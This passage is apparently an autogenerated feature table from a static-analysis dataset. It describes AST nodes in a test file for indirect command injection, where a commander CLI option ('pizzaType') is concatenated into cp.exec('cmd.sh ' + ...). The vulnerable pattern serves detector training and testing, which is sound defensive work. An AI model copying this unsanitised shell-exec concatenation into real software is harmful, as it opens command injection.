autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:16 | program.version | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:16 | program.version | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:16 | program.version | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:16 | program.version | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:16 | program.version | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | exceptional return of program ... 0.0.1') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | exceptional return of program ... 0.0.1') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | exceptional return of program ... 0.0.1') | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | exceptional return of program ... 0.0.1') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | exceptional return of program ... 0.0.1') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:10:143:16 | version | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:10:143:16 | version | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:10:143:16 | version | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:10:143:16 | version | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:10:143:16 | version | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | CalleeFlexibleAccessPath | program.version | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | calleeImports | commander | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:18:143:24 | '0.0.1' | receiverName | program | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:3 | cp | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:8 | cp.exec | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | exceptional return of cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | exceptional return of cp.exec ... zaType) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | exceptional return of cp.exec ... zaType) | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | exceptional return of cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | exceptional return of cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:5:145:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:5:145:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:5:145:8 | exec | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:5:145:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:5:145:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- program.opts().pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:10:145:45 | "cmd.sh ... zzaType | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:28 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:28 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:28 | program | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:28 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:28 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:33 | program.opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:33 | program.opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:33 | program.opts | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:33 | program.opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:33 | program.opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | exceptional return of program.opts() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | exceptional return of program.opts() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | exceptional return of program.opts() | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | exceptional return of program.opts() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | exceptional return of program.opts() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:45 | program ... zzaType | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:30:145:33 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:30:145:33 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:30:145:33 | opts | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:30:145:33 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:30:145:33 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:37:145:45 | pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:37:145:45 | pizzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:37:145:45 | pizzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:37:145:45 | pizzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:37:145:45 | pizzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:3 | cp | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:8 | cp.exec | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | exceptional return of cp.exec ... zaType) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | exceptional return of cp.exec ... zaType) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | exceptional return of cp.exec ... zaType) | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | exceptional return of cp.exec ... zaType) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | exceptional return of cp.exec ... zaType) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:5:146:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:5:146:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:5:146:8 | exec | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:5:146:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:5:146:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- program.pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:10:146:38 | "cmd.sh ... zzaType | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:28 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:28 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:28 | program | enclosingFunctionBody | Command require commander program Command program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:28 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:28 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:22:146:38 | program.pizzaType | contextSurroundingFunctionParameters | () | +| 